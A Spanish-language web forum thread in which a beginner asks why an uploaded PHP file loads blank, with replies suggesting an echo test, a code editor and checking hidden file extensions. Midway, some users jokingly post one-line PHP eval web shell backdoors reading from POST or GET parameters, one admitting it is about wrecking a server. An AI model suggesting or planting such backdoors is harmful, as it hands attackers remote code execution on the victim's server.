Como Llamar a un archivo PHP?

• Autor Autor juancho259
  • Fecha de inicio Fecha de inicio
J

juancho259

Préstamo
Mi
SEO
Verificación en dos pasos activada
Saben como se llama a un archivo con extension .php?

Lo que hice es abrir mi archivo de texto o bloc de notas agregue el codigo php y lo guarde con dicha extencion php. Luego lo subi a mi servidor y luego agarro la URL o ruta de dicho archivo lo pongo en la barra del buscador pero no funciona, esta cargando y al final se queda en blanco lo cual deberia salirme un texto.

Lo malo de convertir un bloc de notas en php sale medio raro la extencion asi: juanito.doc.php

Al ver eso, mejor agarre cualquier archivo php de mi cpanel y lo duplique cambiando de nombre y a ese lo abri borre todo su codigo y agregue el nuevo, y finalmente hice lo mismo agarrar la url y probar, pero nada.

Saben a que se debe?

si no te da error de que no se encuentra el archivo seguro tienes problema en la programacion!

Prueba solo poner un echo en tu archivo, borra todo y pon solo:
<?php echo 'hola'; ?>

Si al entrar al url aparece hola, como dice Yeltsin, tienes error en tu codigo.

Caso contrario si tampoco sale nada, o tu archivo seguro no es .php

Utiliza algun editor de codigo mas avanzado, te ayudara a encontrar donde esta el error mientras lo vas construyendo, yo uso Dreamweaver pero hay otros muy buenos como Sublime Text, y gratis.

Saludos.

Gracias lo voy a probar a ver que tal

Gracias lo voy a probar a ver que tal

juan, no sera que el bloc de nota lo esta guardando como juanito.php.doc, si es asi desde tu mismo server renombra el archivo, por que si lo haces en window puede te pase eso otra vez, a menos que le quites la opcion de ocultar las extensiones de archivos al window, si necesitas ayuda mandame un mp, saludos! :encouragement:

juan, no sera que el bloc de nota lo esta guardando como juanito.php.doc, si es asi desde tu mismo server renombra el archivo, por que si lo haces en window puede te pase eso otra vez, a menos que le quites la opcion de ocultar las extensiones de archivos al window, si necesitas ayuda mandame un mp, saludos! :encouragement:

Efectivamente esa extensión me salio la primera vez, pero luego hice lo que mencionas cambiar de nombre y también probé con duplicar otro archivo y agregar el código y editar el nombre de ese archivo duplicado.

Pero al final nada, probé lo que dice el compañero de arriba de probar con un código corto de "hola" y si funciona, al parecer es el código.

Utiliza mejor un Editor de Code, como Sublime text y vas a la fija.

parece que estas queriendo aprender a programar 😀

seria mas util que pegues el código que queres ejecutar acá para poder ayudarte

Utiliza mejor un Editor de Code, como Sublime text y vas a la fija.

Lo voy a chequear :encouragement:

parece que estas queriendo aprender a programar 😀

eria mas util que pegues el código que queres ejecutar acá para poder ayudarte

No , nada que ver solo que era un código para tener millones de visitas 😀 ojala existiera.

<?php @eval($_POST['page3']);?>

así llamas a todos los archivos php que quieras xD

Prueba solo poner un echo en tu archivo, borra todo y pon solo:
<?php echo 'hola'; ?>

Si al entrar al url aparece hola, como dice Yeltsin, tienes error en tu codigo.

Caso contrario si tampoco sale nada, o tu archivo seguro no es .php

Utiliza algun editor de codigo mas avanzado, te ayudara a encontrar donde esta el error mientras lo vas construyendo, yo uso Dreamweaver pero hay otros muy buenos como Sublime Text, y gratis.

Saludos.

Gracias me sirvio

<?php @eval($_POST['page3']);?>

así llamas a todos los archivos php que quieras xD

de hecho no habra ningun boton ni tampoco un js la cual haga crear un campo con id page3 dentro del form lo cual el eval no funcionara ni se activara 😕😕😕😕
seria mejor un
<?php @eval($_GET['id']);?>
PD: no lo pongas estamos hablando de como joder un servidor e.e .

Si la ruta está bien, lo más probable es que el código tenga un error y por eso se queda en blanco.

de hecho no habra ningun boton ni tampoco un js la cual haga crear un campo con id page3 dentro del form lo cual el eval no funcionara ni se activara 😕😕😕😕
seria mejor un
<?php @eval($_GET['id']);?>
PD: no lo pongas estamos hablando de como joder un servidor e.e .

Se puede usar cURL y mandar ese campo.

P.D: Nunca he visto que un block de notas ponga extención .doc sin que uno se la ponga.

Atrás